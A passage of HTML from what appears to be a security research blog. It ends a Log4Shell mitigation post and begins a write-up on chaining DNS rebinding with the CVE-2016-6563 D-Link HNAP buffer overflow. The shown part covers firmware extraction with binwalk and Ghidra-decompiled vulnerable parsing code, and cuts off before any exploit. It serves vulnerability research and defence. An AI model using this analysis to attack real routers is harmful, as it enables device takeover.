href="https://github.com/NCSC-NL/log4shell/tree/main/software" target="_blank">vendor</a> you should ping them, <u>asking for a patch or minor release</u>. If they tell you that you must update to a major release and your product is not EOL, you should insist on a minor/patch-level release which addresses the vulnerability.</li><li>For each internal application, update the Log4j library to version <b>2.16</b>.</li><ul><li>WARNING: Log4j <b>2.16</b> requires Java 8, so if you have Java < 8 there might be some more time-consuming effort. 
In that case, see if the following workarounds are worth trying.</li></ul></ul></div><div><br /></div><div><b>The workarounds:</b></div><div><ul style="text-align: left;"><li>if <b>Log4j version >= 2.10</b>, <a href="https://logging.apache.org/log4j/2.x/security.html" target="_blank">as explained here</a>, you can do the following steps:</li><ol><li>export the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true system-wide;</li><li>relaunch the application;</li><li>check if you're still vulnerable with a PoC.</li></ol><li>For each affected machine:</li><ul><li>if <b>it's not supposed</b> to generate egress traffic, <b>block</b> <u>DNS requests</u> and <u>new outbound traffic</u>.</li><li>if <b>it's supposed</b> to generate outbound traffic, well...that falls into the <b>anomaly detection</b> category, which could help, but be sure that it is not a fingerprint-based one, since there are a <a href="https://twitter.com/Rezn0k/status/1469523006015750146" target="_blank">lot</a> of <a href="https://github.com/woodpecker-appstore/log4j-payload-generator" target="_blank">ways</a> to bypass blocking rules.</li><li>last but not least, it might be interesting to experiment with some kind of RASP, <a href="https://github.com/corretto/hotpatch-for-apache-log4j2" target="_blank">such as this one</a>, which is able to identify contextual traffic without the risk of bypasses.</li></ul></ul><div>Here's a nice infographic about the attack flow and the points of mitigation from <a href="https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/" target="_blank">GovCert.CH</a>:</div></div><h3 style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhF-Exzr5ukFDFaFJyintBwh6L_pKOV5ZWhyphenhyphenAXeKC1oAIud14Hn1tAMG9rz-kZGlOzDuXEYtTiYYh2N7WqxmtZNhdXA1RmHBwkoLg8aoKJKM9F7D9C3KG6M1YmBijHcxduw31BSKza2msc/" style="margin-left: 1em; margin-right: 1em;"><img alt="" 
data-original-height="814" data-original-width="1204" height="216" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhF-Exzr5ukFDFaFJyintBwh6L_pKOV5ZWhyphenhyphenAXeKC1oAIud14Hn1tAMG9rz-kZGlOzDuXEYtTiYYh2N7WqxmtZNhdXA1RmHBwkoLg8aoKJKM9F7D9C3KG6M1YmBijHcxduw31BSKza2msc/" width="320" /></a></div><br /><br /></h3><h3 style="text-align: left;">Conclusions</h3><div>This post was written in order to give some clarification about the CVE-2021-44228 and to give some thoughtful information regarding attacks, checks and fixes. </div><div>Please comment/email us if you need more clarifications.</div><div><br /></div>Stefano Di Paolahttp://www.blogger.com/profile/11966634329749157589noreply@blogger.com0tag:blogger.com,1999:blog-7122745763234660283.post-50804812520495002092021-08-31T01:17:00.006-07:002021-08-31T01:21:40.587-07:00A Journey Into the Beauty of DNSRebinding - Part 2<h4 style="text-align: left;"><b><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFUbwqScaadVAeGqh3JSxLZaH936SBrNxYcarxTAfoYRcIIQ_JkbhqxYQL8JweFLYA3rtyNpQJw5shaJuNyzQ0V2BHSJvSdwPG18x0__WARFFboPLK3Bbx2Wytckpk73VP82HW9ghG861B/s253/DNS_2.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" data-original-height="225" data-original-width="253" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFUbwqScaadVAeGqh3JSxLZaH936SBrNxYcarxTAfoYRcIIQ_JkbhqxYQL8JweFLYA3rtyNpQJw5shaJuNyzQ0V2BHSJvSdwPG18x0__WARFFboPLK3Bbx2Wytckpk73VP82HW9ghG861B/s0/DNS_2.jpg" width="253" /></a></div><br /><span style="font-family: helvetica;"><br /></span></b></h4><h4 style="text-align: left;"><b><span style="font-family: helvetica;">Abstract</span></b></h4><p style="text-align: left;"><span style="font-family: helvetica;">In the <a href="https://blog.mindedsecurity.com/2021/02/journey-into-beauty-of-dnsrebinding.html" target="_blank">first</a> part, after a 
fast overview of the <i>DNS Rebinding</i> technique, we considered a practical example in which UPnP services were exploited to perform NAT Injection attacks and, therefore, expose internal services on the Internet.</span></p><p style="text-align: left;"><span style="font-family: helvetica;">In this second post we are going to demonstrate how <i>DNS Rebinding</i> could be used to exploit vulnerable services running locally in order to achieve Remote Code Execution (RCE). </span></p><p style="text-align: left;"><span style="font-family: helvetica;">In particular, we will consider the case of <a href="https://nvd.nist.gov/vuln/detail/CVE-2016-6563" target="_blank">CVE-2016-6563</a>, a known Buffer Overflow issue caused by unsafe parsing of the XML fields present in the login SOAP request, affecting the HNAP service of some D-Link routers.</span></p><p style="text-align: left;"><span style="font-family: helvetica;">In short, these are the steps needed to create a working <i>DNS Rebinding</i> proof of concept:</span></p><div><div style="text-align: left;"><ul style="text-align: left;"><li><span style="font-family: helvetica;">Firmware static and dynamic analysis;</span></li><li><span style="font-family: helvetica;">Buffer Overflow sink and source identification through static binary analysis;</span></li><li><span style="font-family: helvetica;">Exploit development through binary emulation;</span></li><li><span style="font-family: helvetica;">DNS Rebinding + Buffer Overflow ROP exploit chaining.</span></li></ul></div><div style="text-align: left;"><span style="font-family: helvetica;"><br /></span></div><div style="text-align: left;"><span style="font-family: helvetica;"><br /></span><h4 style="box-sizing: border-box; break-after: avoid-page; break-inside: avoid; clear: both; letter-spacing: -1px; line-height: 1.5rem; margin: 0px 0px 1.5rem; overflow-wrap: break-word; padding: 0px; position: relative; text-align: left; white-space: 
pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"><span style="font-family: helvetica;">Static Firmware and Binary Analysis</span></span></h4><span style="font-family: helvetica;">As a first step, we downloaded the "DIR-842_C1_FW300b18.bin" firmware, which was available on the vendor site, and extracted the <i>squash-fs</i> filesystem by using <i>binwalk</i>.<br /></span></div><div><span style="font-family: helvetica;"><br /></span></div><div><span style="font-family: helvetica;"><span class="md-plain md-expand" md-inline="plain"><pre cid="n63" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="bash" mdtype="fences" spellcheck="false" style="background: rgb(51, 51, 51); box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-size: 0.9rem; margin-bottom: 20px; margin-top: 0px; overflow: visible; padding: 10px 10px 10px 30px; position: relative; white-space: normal; width: inherit;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">$ binwalk</span> <span class="cm-attribute" style="box-sizing: border-box; color: #7575e4;">-e</span> DIR-842_C1_FW300b18.bin </span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">DECIMAL HEXADECIMAL DESCRIPTION</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-attribute" style="box-sizing: border-box; color: #7575e4;">--------------------------------------------------------------------------------</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0</span> 0x0 DLOB firmware header, boot partition: <span class="cm-string" 
style="box-sizing: border-box; color: #d26b6b;">"dev=/dev/mtdblock/5"</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">112</span> 0x70 uImage header, header size: <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">64</span> bytes, header CRC: 0x6A7785EB, created: <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">2017</span><span class="cm-attribute" style="box-sizing: border-box; color: #7575e4;">-05-19</span> <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">16</span>:57:27, image size: <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">1226247</span> bytes, Data Address: 0x80060000, Entry Point: 0x80060000, data CRC: 0xCD5C9222, OS: Linux, CPU: MIPS, image type: Multi-File Image, compression type: lzma, image name: <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"MIPS Seattle Linux-3.3.8"</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">184</span> 0xB8 LZMA compressed data, properties: 0x6D, dictionary size: <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">8388608</span> bytes, uncompressed size: <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">3616252</span> bytes</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">1245296</span> 0x130070 PackImg section delimiter tag, little endian size: <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">15765760</span> bytes; big endian size: <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">9564160</span> bytes</span><br /><span role="presentation" style="box-sizing: border-box; 
padding-right: 0.1px;"><span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">1245328</span> 0x130090 Squashfs filesystem, little endian, version <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">4</span>.0, compression:xz, size: <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">9563526</span> bytes, <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">2480</span> inodes, blocksize: <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">131072</span> bytes, created: <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">2017</span><span class="cm-attribute" style="box-sizing: border-box; color: #7575e4;">-05-19</span> <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">16</span>:57:32</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span></pre></span><br />Then we started to inspect the "hnap" binary inside the filesystem and found the same behavior described in <a href="https://nvd.nist.gov/vuln/detail/CVE-2016-6563" target="_blank">CVE-2016-6563</a>.<span class="md-plain md-expand" md-inline="plain"><br /></span></span></div><div><span style="font-family: helvetica;"><br /></span></div><div><span style="box-sizing: border-box; font-family: helvetica;">We then reversed the target binary with <i>Ghidra</i> and, by looking for the strings related to the login parameters, we identified the following function, which is renamed "Vulnerable" in the snippet of code below.</span></div><div><span style="font-family: helvetica;"><br /></span><pre cid="n65" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="c" mdtype="fences" spellcheck="false" style="background: rgb(51, 51, 51); box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-size: 0.9rem; margin-bottom: 20px; margin-top: 0px; overflow: 
visible; padding: 10px 10px 10px 30px; position: relative; white-space: normal; width: inherit;"><span style="font-family: helvetica;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-variable" style="box-sizing: border-box;">undefined4</span> <span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">Vulnerable</span>(<span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">*</span><span class="cm-variable" style="box-sizing: border-box;">param_1</span>)</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">{</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">undefined4</span> <span class="cm-variable" style="box-sizing: border-box;">uVar1</span>;</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">int</span> <span class="cm-variable" style="box-sizing: border-box;">iVar2</span>;</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">size_t</span> <span class="cm-variable" style="box-sizing: border-box;">sVar3</span>;</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">*</span><span class="cm-variable" style="box-sizing: border-box;">pcVar4</span>;</span><br /><span role="presentation" 
style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">undefined4</span> <span class="cm-variable" style="box-sizing: border-box;">local_758</span>;</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">undefined4</span> <span class="cm-variable" style="box-sizing: border-box;">local_750</span>;</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">*</span><span class="cm-variable" style="box-sizing: border-box;">local_74c</span>;</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">*</span><span class="cm-variable" style="box-sizing: border-box;">local_748</span>;</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">undefined</span> <span class="cm-variable" style="box-sizing: border-box;">auStack1860</span> [<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">4</span>];</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">undefined4</span> <span class="cm-variable" style="box-sizing: border-box;">local_740</span>;</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable" style="box-sizing: border-box;">acStack1852</span> [<span class="cm-number" 
style="box-sizing: border-box; color: #64ab8f;">80</span>];</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable" style="box-sizing: border-box;">acStack1772</span> [<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">144</span>];</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable" style="box-sizing: border-box;">acStack1628</span> [<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">64</span>];</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable" style="box-sizing: border-box;">acStack1564</span> [<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">64</span>];</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">undefined2</span> <span class="cm-variable" style="box-sizing: border-box;">local_5dc</span>;</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable" style="box-sizing: border-box;">acStack1484</span> [<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">64</span>];</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable" style="box-sizing: border-box;">acStack1420</span> [<span class="cm-number" style="box-sizing: border-box; color: 
#64ab8f;">68</span>];</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable" style="box-sizing: border-box;">acStack1352</span> [<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">64</span>];</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable" style="box-sizing: border-box;">Action</span> [<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">128</span>];</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable" style="box-sizing: border-box;">Username</span> [<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">128</span>];</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable" style="box-sizing: border-box;">Password</span> [<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">128</span>];</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">undefined</span> <span class="cm-variable" style="box-sizing: border-box;">Captcha</span> [<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">128</span>];</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">undefined</span> <span class="cm-variable" style="box-sizing: border-box;">auStack776</span> [<span class="cm-number" 
style="box-sizing: border-box; color: #64ab8f;">10</span>];</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">undefined</span> <span class="cm-variable" style="box-sizing: border-box;">auStack766</span> [<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">20</span>];</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">undefined</span> <span class="cm-variable" style="box-sizing: border-box;">auStack746</span> [<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">98</span>];</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable" style="box-sizing: border-box;">acStack648</span> [<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">64</span>];</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable" style="box-sizing: border-box;">acStack584</span> [<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">64</span>];</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">undefined</span> <span class="cm-variable" style="box-sizing: border-box;">auStack520</span> [<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">64</span>];</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable" style="box-sizing: border-box;">acStack456</span> [<span 
class="cm-number" style="box-sizing: border-box; color: #64ab8f;">64</span>];</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable" style="box-sizing: border-box;">acStack392</span> [<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">128</span>];</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable" style="box-sizing: border-box;">acStack264</span> [<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">128</span>];</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable" style="box-sizing: border-box;">acStack136</span> [<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">128</span>];</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> </span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">memset</span>(<span class="cm-variable" style="box-sizing: border-box;">Action</span>,<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0</span>,<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0x80</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">memset</span>(<span class="cm-variable" style="box-sizing: border-box;">Username</span>,<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0</span>,<span class="cm-number" style="box-sizing: border-box; color: 
#64ab8f;">0x80</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">memset</span>(<span class="cm-variable" style="box-sizing: border-box;">Password</span>,<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0</span>,<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0x80</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">memset</span>(<span class="cm-variable" style="box-sizing: border-box;">Captcha</span>,<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0</span>,<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0x80</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">memset</span>(<span class="cm-variable" style="box-sizing: border-box;">auStack776</span>,<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0</span>,<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0x80</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">memset</span>(<span class="cm-variable" style="box-sizing: border-box;">acStack648</span>,<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0</span>,<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0x40</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">memset</span>(<span class="cm-variable" style="box-sizing: border-box;">acStack584</span>,<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0</span>,<span class="cm-number" 
style="box-sizing: border-box; color: #64ab8f;">0x40</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">memset</span>(<span class="cm-variable" style="box-sizing: border-box;">auStack520</span>,<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0</span>,<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0x40</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">memset</span>(<span class="cm-variable" style="box-sizing: border-box;">acStack456</span>,<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0</span>,<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0x40</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">memset</span>(<span class="cm-variable" style="box-sizing: border-box;">acStack392</span>,<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0</span>,<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0x80</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">memset</span>(<span class="cm-variable" style="box-sizing: border-box;">acStack264</span>,<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0</span>,<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0x80</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">DAT_00433260</span> <span class="cm-operator" style="box-sizing: border-box;">=</span> <span class="cm-variable" style="box-sizing: 
border-box;">FUN_0041e620</span>();</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">local_758</span> <span class="cm-operator" style="box-sizing: border-box;">=</span> <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0</span>;</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">FUN_004057ec</span>(<span class="cm-variable" style="box-sizing: border-box;">FUN_00419794</span>,<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0</span>,<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0x10000</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">uVar1</span> <span class="cm-operator" style="box-sizing: border-box;">=</span> <span class="cm-variable" style="box-sizing: border-box;">FUN_0041edb4</span>(<span class="cm-variable" style="box-sizing: border-box;">DAT_00433260</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">VulnerableCalled</span>(<span class="cm-variable" style="box-sizing: border-box;">uVar1</span>,<span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"Action"</span>,<span class="cm-variable" style="box-sizing: border-box;">Action</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">uVar1</span> <span class="cm-operator" style="box-sizing: border-box;">=</span> <span class="cm-variable" style="box-sizing: border-box;">FUN_0041edb4</span>(<span class="cm-variable" style="box-sizing: border-box;">DAT_00433260</span>);</span><br /><span role="presentation" 
style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">VulnerableCalled</span>(<span class="cm-variable" style="box-sizing: border-box;">uVar1</span>,<span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"Username"</span>,<span class="cm-variable" style="box-sizing: border-box;">Username</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">uVar1</span> <span class="cm-operator" style="box-sizing: border-box;">=</span> <span class="cm-variable" style="box-sizing: border-box;">FUN_0041edb4</span>(<span class="cm-variable" style="box-sizing: border-box;">DAT_00433260</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">VulnerableCalled</span>(<span class="cm-variable" style="box-sizing: border-box;">uVar1</span>,<span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"LoginPassword"</span>,<span class="cm-variable" style="box-sizing: border-box;">Password</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">uVar1</span> <span class="cm-operator" style="box-sizing: border-box;">=</span> <span class="cm-variable" style="box-sizing: border-box;">FUN_0041edb4</span>(<span class="cm-variable" style="box-sizing: border-box;">DAT_00433260</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">VulnerableCalled</span>(<span class="cm-variable" style="box-sizing: border-box;">uVar1</span>,<span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"Captcha"</span>,<span class="cm-variable" style="box-sizing: border-box;">Captcha</span>);</span><br /><span 
role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> </span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> . . .</span></span></pre><p cid="n66" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #b8bfc6; font-size: 16px; line-height: inherit; margin-bottom: 1.5rem; margin-top: 0px; orphans: 4; overflow-wrap: break-word; position: relative; white-space: pre-wrap;"></p><span style="font-family: helvetica;">The "Action", "Username", "LoginPassword" and "Captcha" XML fields are parsed by the method we renamed "VulnerableXMLParser" (it is the function called as "VulnerableCalled" in the snippet above):</span></div><div><span style="font-family: helvetica;"><br /></span><pre cid="n68" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="c" mdtype="fences" spellcheck="false" style="background: rgb(51, 51, 51); box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-size: 0.9rem; margin-bottom: 20px; margin-top: 0px; overflow: visible; padding: 10px 10px 10px 30px; position: relative; white-space: normal; width: inherit;"><span style="font-family: helvetica;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">void</span> <span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">VulnerableXMLParser</span>(<span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">*</span><span class="cm-variable" style="box-sizing: border-box;">controllable_input</span>,<span class="cm-variable" style="box-sizing: border-box;">undefined4</span> <span class="cm-variable" style="box-sizing: border-box;">param_2</span>,<span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">*</span><span class="cm-variable" style="box-sizing: 
